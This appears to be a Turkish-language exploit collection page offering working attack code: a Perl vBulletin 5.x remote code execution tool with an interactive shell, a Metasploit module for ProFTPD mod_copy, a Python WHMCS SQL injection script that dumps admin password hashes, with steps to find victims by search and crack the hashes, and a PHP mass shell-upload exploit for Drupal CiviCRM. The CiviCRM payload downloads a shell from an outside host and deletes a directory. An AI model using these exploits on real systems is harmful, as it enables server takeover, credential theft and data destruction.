
vBulletin 5.x – Remote Code Execution Exploit


vBulletin 5.x – Remote Code Execution Exploit
vBulletin 5 sürümlerinde bulunan uzaktan kod çalıştırma ve shell upload etme açığına ilişkin exploit. (Açık, kimlik doğrulaması gerektirmeyen /ajax/api/hook/decodeArguments uç noktasının kullanıcıdan gelen "arguments" parametresini unserialize etmesinden kaynaklanır; aşağıdaki script bu yolla system() çağırtır.)

#[+] Title:  Vbulletin 5.x - Remote Code Execution Exploit
#[+] Product: vbulletin
#[+] Vendor: http://vbulletin.com
#[+] Vulnerable Version(s): Vbulletin 5.x
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/reza.espargham
# Special Thanks : Mohammad Emad
 
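system(($^O eq 'MSWin32') ? 'cls' : 'clear');

use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;

print "\n\t Enter Target [ Example:http://target.com/forum/ ]";
print "\n\n \t Enter Target : ";
$Target=<STDIN>;
chomp($Target);
# The example prompt shows a trailing slash; strip it so we do not build "//ajax/...".
$Target =~ s{/+$}{};

# Build the decodeArguments URL that makes the target run one shell command.
#
# The "arguments" value is a PHP-serialized vB_dB_Result whose protected "db"
# member is a vB_Database with its free_result hook mapped to system(); the
# protected "recordset" string is what system() receives.  Two things must
# agree for unserialize() to accept it: the s:N:"..." length N is the *byte*
# length of the raw command, while the command itself has to be URL-encoded
# (the original sent it verbatim, so a space, '&', '#', '+' or '%' in a
# command silently corrupted the query string and the serialized length).
# The %00 bytes are the NULs PHP uses around protected property names.
sub gadget_url {
    my ($target, $cmd) = @_;
    my $enc = $cmd;
    $enc =~ s/([^A-Za-z0-9_.~-])/sprintf('%%%02X', ord($1))/ge;
    return $target
        . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:'
        . length($cmd) . ':"' . $enc . '";}';
}

# Probe: ask the target's shell to expand 0xfee10000; only a host that really
# executed the command echoes the decimal 4276158464 back.
$response = $ua->get(gadget_url($Target, 'echo $((0xfee10000))'));
$source = $response->decoded_content;
$source = '' unless defined $source;   # failed request / empty body is "not vulnerable", not a warning

if ($source =~ m/4276158464/i)
{
    $response = $ua->get(gadget_url($Target, 'whoami'));
    $user = $response->decoded_content;
    $user = '' unless defined $user;
    chomp($user);
    print "\n Target Vulnerable ;)\n";

    # Interactive loop.  The original `while($cmd=="exit")` compared
    # numerically (undef == "exit" == 0), so it looped forever *until* a
    # command that parsed as a non-zero number was typed, which ended the
    # session; and `m/exit/i` also quit on e.g. "cat exit.log".
    while (1)
    {
        print "\n\n$user\$ ";
        $cmd = <STDIN>;
        last unless defined $cmd;            # EOF on stdin
        chomp($cmd);
        last if $cmd =~ m/^\s*exit\s*$/i;     # only a bare "exit" quits
        next if $cmd eq '';
        $response = $ua->get(gadget_url($Target, $cmd));
        $source = $response->decoded_content;
        $source = '' unless defined $source;
        print "\n" . $source;
    }
    exit 0;
}else{print "\ntarget is not Vulnerable\n\n"}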

ProFTPD 1.3.5 Mod_Copy Command Execution

ProFTPD 1.3.5'in mod_copy modülünde, kimlik doğrulaması gerektirmeyen SITE CPFR/CPTO komutlarıyla uzaktan komut çalıştırma açığı (CVE-2015-3306) bulunmuş olup, açığa ilişkin Metasploit modülü aşağıdaki gibidir.

##
# This module requires Metasploit: metasploit.com/download
# Current source: github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
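class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ProFTPD 1.3.5 Mod_Copy Command Execution',
      'Description'    => %q{
          This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
          Any unauthenticated client can leverage these commands to copy files from any
          part of the filesystem to a chosen destination. The copy commands are executed with
          the rights of the ProFTPD service, which by default runs under the privileges of the
          'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
          directory, PHP remote code execution is made possible.
      },
      'Author'         =>
        [
          'Vadim Melihow', # Original discovery, Proof of Concept
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-3306' ],
          [ 'EDB', '36742' ]
        ],
      'Privileged'     => false,
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'BadChars' => '',
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic gawk bash python perl'
            }
        },
      'Targets'        =>
        [
          [ 'ProFTPD 1.3.5', { } ]
        ],
      'DisclosureDate' => 'Apr 22 2015',
      'DefaultTarget' => 0))

    register_options(
      [
        OptPort.new('RPORT', [true, 'HTTP port', 80]),
        OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
        OptString.new('TARGETURI', [true, 'Base path to the website', '/']),
        OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']),
        OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www'])
      ], self.class)
  end

  # Vulnerability check: an unpatched server accepts "SITE CPFR <path>" (350)
  # before any login.  Returns CheckCode::Vulnerable or CheckCode::Safe;
  # connection / banner problems raise through fail_with.  The socket is
  # always closed (the original leaked it on every path).
  def check
    sock = ftp_connect
    res = ftp_site(sock, 'CPFR /etc/passwd')
    if res && res.include?('350')
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  ensure
    sock.close if sock
  end

  # Drops a one-line PHP stager into SITEPATH via two copy round-trips and
  # then requests it over HTTP with the encoded payload as a GET parameter.
  #
  # The stager is carried in a *file name*: the path handed to CPTO is what
  # ends up in the FTP process's own command line, so copying
  # /proc/self/cmdline to that path produces a file that contains the PHP
  # (presumably because ProFTPD rewrites its process title with the command
  # being served -- verify against the original advisory).  Both dropped
  # files stay on the target; the module only warns about them.
  def exploit
    get_arg = rand_text_alphanumeric(5 + rand(3))
    payload_name = rand_text_alphanumeric(5 + rand(3)) + '.php'
    stager_path = "#{datastore['TMPPATH']}/.<?php passthru($_GET['#{get_arg}']);?>"
    php_path = "#{datastore['SITEPATH']}/#{payload_name}"

    sock = ftp_connect
    begin
      print_status("#{rhost}:#{datastore['RPORT_FTP']} - Sending copy commands to FTP server")
      # CPFR answers 350 (source accepted), CPTO answers 250 (copy done).
      ftp_copy(sock, 'CPFR /proc/self/cmdline', '350',
               'Failure copying from /proc/self/cmdline')
      ftp_copy(sock, "CPTO #{stager_path}", '250',
               'Failure copying to temporary payload file')
      ftp_copy(sock, "CPFR #{stager_path}", '350',
               'Failure copying from temporary payload file')
      ftp_copy(sock, "CPTO #{php_path}", '250',
               'Failure copying PHP payload to website path, directory not writable?')
    ensure
      # Close on success *and* on fail_with; the original only closed on success.
      sock.close
    end

    print_warning("#{peer} - Left #{stager_path} and #{php_path} on the target; remove them once a session is up")
    print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}")
    res = send_request_cgi!(
      'uri' => normalize_uri(target_uri.path, payload_name),
      'method' => 'GET',
      'vars_get' => { get_arg => "nohup #{payload.encoded} &" }
    )

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Failure executing payload")
    end
  end

  private

  # Connect to RPORT_FTP and consume the 220 greeting.  Returns the open
  # socket; the caller owns it and must close it.  Fails the module (after
  # closing the socket) when there is no connection or no 220 banner.
  def ftp_connect
    ftp_port = datastore['RPORT_FTP']
    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
    # NOTE(review): create_tcp normally raises on failure rather than
    # returning nil; the nil check is kept from the original as belt and braces.
    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
    end
    print_status("#{rhost}:#{ftp_port} - Connected to FTP server")

    res = sock.get_once(-1, 10)
    unless res && res.include?('220')
      sock.close
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
    end
    sock
  end

  # Send one "SITE <command>" line and return the raw reply (nil on timeout).
  def ftp_site(sock, command)
    sock.put("SITE #{command}\r\n")
    sock.get_once(-1, 10)
  end

  # Send a SITE copy command and fail the module with +failure_msg+ unless
  # the reply carries +expected_code+.
  def ftp_copy(sock, command, expected_code, failure_msg)
    res = ftp_site(sock, command)
    return if res && res.include?(expected_code)
    fail_with(Failure::Unknown, "#{rhost}:#{datastore['RPORT_FTP']} - #{failure_msg}")
  end

end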

WHMCS 5.2.7 SQL Injection Vulnerability

Açığın kullanımına ilişkin açıklama (exploit, hedefte önceden açılmış sıradan bir müşteri hesabı ister; kimlik doğrulaması olmadan çalışmaz):
1- python exploit indir
2- c:\python ana dizine at
3- “powered by whmcompletesolution” şeklinde arat
4- register.php ye tıkla ve üye ol
5- exploite url yi kaydet
6- komut sisteminden python 28807.py komutunu ver
7- açık varsa görüldüğü gibi md5 hashı görünecektir
8- googleden md5 crack sitelerini bul dene veritabanlarında kayıtlıysa kırılacaktır.

#!/usr/bin/env python
# 2013/10/03 - WHMCS 5.2.7 SQL Injection
# http://localhost.re/p/whmcs-527-vulnerability

# Target and the throwaway customer account used for the authenticated request.
# ``url`` must end with a slash: the script appends page names to it verbatim.
url, user_email, user_pwd = (
	'http://clients.target.com/',   # wopsie dopsie
	'mysuper@hacker.account',       # just create a dummie account at /register.php
	'hacker',
)

import urllib, re, sys
from urllib2 import Request, urlopen
# Browser-looking User-Agent sent with every request (implicit string concatenation).
ua = ("Mozilla/5.0 (Windows NT 6.2; WOW64) "
      "AppleWebKit/537.36 (KHTML, like Gecko) "
      "Chrome/30.0.1599.17 Safari/537.36")

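def exploit(sql):
	"""Evaluate one SQL expression on the target and return what the page echoes back.

	The profile-update POST (clientarea.php?action=details) is sent with the
	``firstname`` field set to ``AES_ENCRYPT(1,1), firstname=<sql>``; according
	to the writeup this script follows, such a value reaches the UPDATE
	statement unescaped, so ``<sql>`` is evaluated by MySQL and stored in the
	row (TODO: confirm the AES_ENCRYPT prefix is what defeats the escaping).
	The stored result is then read back from the ``firstname`` input of the
	returned form.

	Uses the module-level ``url``, ``user_email``, ``ua`` and ``user``
	([session cookie, CSRF token] as returned by ``login()``).  Returns the
	captured string, or ``None`` when the response has no firstname field
	(patched target, rejected update, expired session) instead of crashing
	with an AttributeError.
	"""
	print "Doing stuff: %s" % sql
	# Ordered pairs (not a dict) so the body field order is stable.
	fields = [
		('token', user[1]),
		('firstname', 'AES_ENCRYPT(1,1), firstname=%s' % sql),
		('lastname', '1'),
		('companyname', '1'),
		('email', user_email),
		('paymentmethod', 'none'),
		('billingcid', '0'),
		('address1', '1'),
		('address2', '1'),
		('city', '1'),
		('state', '1'),
		('postcode', '1'),
		('country', 'US'),
		('phonenumber', '1'),
		('save', 'Save Changes'),
	]
	# urlencode() so that '&', '+', '#' or '=' inside ``sql`` cannot split or
	# truncate the body; the original interpolated the expression raw.
	req = Request('%sclientarea.php?action=details' % url,
				  data=urllib.urlencode(fields),
				  headers={"User-agent": ua, "Cookie": user[0]})
	r = urlopen(req).read()
	m = re.search(r'(id="firstname" value="(.*?)")', r)
	if m is None:
		print "No firstname field in the response - target patched, or the update was rejected"
		return None
	return m.group(2)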

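def login():
	"""Log the dummy account in and return ``[cookie, csrf_token]``.

	Fetches login.php for the session cookie and the CSRF token, posts the
	credentials to dologin.php, then reads the token from the post-login
	page (the regex expects a 40-hex-digit hidden ``token`` field) because
	that is the one ``exploit()`` has to send.  Uses the module-level ``url``,
	``user_email``, ``user_pwd`` and ``ua``.  Exits with a message when a
	step does not yield what the next one needs, instead of dying with an
	AttributeError (no token) or KeyError (no Set-Cookie).
	"""
	token_re = r'(type="hidden" name="token" value="([0-9a-f]{40})")'

	print "Getting CSRF token"
	r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua}))
	m = re.search(token_re, r.read())
	if m is None:
		sys.exit('No CSRF token on login.php - wrong url, or not a WHMCS login page')
	csrf = m.group(2)
	set_cookie = r.info().get('set-cookie')
	if not set_cookie:
		sys.exit('login.php did not set a session cookie')
	cookie = set_cookie.split(';')[0]

	print "Logging in"
	body = urllib.urlencode([('username', user_email), ('password', user_pwd), ('token', csrf)])
	r = urlopen(Request('%sdologin.php' % url, data=body,
						headers={"User-agent": ua, "Cookie": cookie})).read()
	# A failed login bounces back to the login form, which references dologin.php.
	if 'dologin.php' in r:
		sys.exit('Unable to login')
	m = re.search(token_re, r)
	if m is None:
		sys.exit('Logged in, but no CSRF token on the landing page')
	return [cookie, m.group(2)]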

user = login()  # [session cookie, CSRF token] for the dummy account

# Read-only probes: dump the admin table, then count the client rows.
queries = [
	'(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)',  # get admins
	'(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)',  # just get a count of clients
]
for sql in queries:
	print exploit(sql)

# oh you want to be evil -- this one writes to the password column of the row
# being updated; it is destructive and deliberately left commented out.
#exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as x)#" % user_email)

nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit

nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit sayesinde uzaktaki bir sunucuya erişim sağlanmakta; root yetkisi vermese de, normalde izin verilmeyen dizinlerde işlem yapma imkânı tanımaktadır.

Drupal civicrm module remote file upload Vulnerability

Drupal civicrm modülünde tarafımdan remote file upload açığı bulunmuştur.
Açık /sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php dosyasından kaynaklanmakta olup, ofc_upload_image.php?name=Shell.php adresine POST edildiğinde sites/all/modules/civicrm/packages/OpenFlashChart/tmp-upload-images/ klasörüne PHP kodu yüklenebilmekte ve sunucuya erişim sağlanabilmektedir (dosya adı query string'den, içerik ise ham POST gövdesinden alınmakta, herhangi bir kimlik doğrulaması veya uzantı denetimi yapılmamaktadır). Çok önemli sitelerde gördüğüm bu açık nedeniyle açık tarafımdan public edilmiştir.
Aşağıda yazmış olduğum civicrm remote file upload exploitiyle, localhost'tan PHP komutu çalıştırılmak suretiyle çok kısa zamanda yüzlerce siteye shell upload edilebilmekte; shell değişik dizinlere kopyalanarak, upload edildiği dizin klasörü imha edilmek suretiyle açık kapatılmaktadır.
aynı scriptin joomla eklentisi buradaki sitemizde yayınlanmıştır.
Php exploit ve açığın kullanım şekli aşağıdaki gibidir.

# Exploit Title: Drupal civicrm module remote file upload exploit
# Google Dork:"Index of /sites/all/modules/civicrm/packages/OpenFlashChart/"
# Date: 20/04/2013
# Exploit Author: iskorpitx
# Vendor Homepage: http://civicrm.org
# Software Link: http://sourceforge.net/projects/civicrm/files/civicrm-stable/4.2.2/civicrm-4.2.2-drupal.tar.gz/download
# Version: [civicrm 4.2.2]
# Tested on: Win8 Pro x64
# CVE : http://www.securityweb.org

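<?php
# Drupal module civicrm OpenFlashCart ofc_upload_image.php remote file upload exploit
# http://www.securityweb.org & http://www.security.biz.tr
# multithreading mass   c:\appserv\www>exp.php -u http://target.com/ -f post.php
#
# (The published copy was HTML-mangled: "<?php" had become "<!--?php" and the
# closing "?>" inside $data had become "?-->", so the dropped file was never
# valid PHP.  Restored here.)
#
# ofc_upload_image.php takes the file name from the query string and the file
# body from the raw POST data, and writes it under tmp-upload-images/ with no
# authentication or extension check; the web server then serves it.

$options = getopt('u:f:');

if(!isset($options['u'], $options['f']))
die("\n        Usage example: php exp.php -u http://target.com/ -f post.php\n
-u http://target.com/    The full path to Drupal!
-f post.php             The name of the file to create.\n");

// Normalise to exactly one trailing slash: the paths below are appended verbatim.
$url     =  rtrim($options['u'], '/') . '/';
$file    =  $options['f'];

$shell = "{$url}sites/all/modules/civicrm/packages/OpenFlashChart/tmp-upload-images/{$file}";
$url   = "{$url}sites/all/modules/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=" . rawurlencode($file);

// Stager written to tmp-upload-images/<file>.
// NOTE(review): as published it downloads a third-party shell (shell.txt) from
// securityweb.org, copies it to /tmp and then deletes the whole
// tmp-upload-images directory on the target.  Pulling code from a host you do
// not control is a supply-chain risk and the rm -rf is destructive -- replace
// this with your own payload before use.
$data      = '<?php   system("wget http://www.securityweb.org/shell.txt; mv shell.txt post.php");  system("cp post.php ../../../../../../../tmp/post.php");  system("cd ..; rm -rf tmp-upload-images");  echo "by iskorpitx" ;   fclose ( $handle );   ?>';
// text/plain keeps PHP from parsing the body into $_POST, so the target
// script can read it raw (its failure mode below mentions HTTP_RAW_POST_DATA).
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');

echo "        [+] Submitting request to: {$options['u']}\n";

$handle = curl_init();

curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);   // setting POSTFIELDS makes the request a POST
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);

$source = curl_exec($handle);
curl_close($handle);

// strpos() returns false when the marker is absent; compare strictly, because
// the original "!strpos(...)" would also have been true for a match at offset 0.
// The fopen() of $shell is an HTTP GET (needs allow_url_fopen) and is what
// actually runs the stager on the target.
if(strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') === false && @fopen($shell, 'r'))
{
echo "        [+] Exploit completed successfully!\n";
echo "        ______________________________________________\n\n        {$shell}?cmd=system('id');\n";
}
else
{
die("        [+] Exploit was unsuccessful.\n");
}

?>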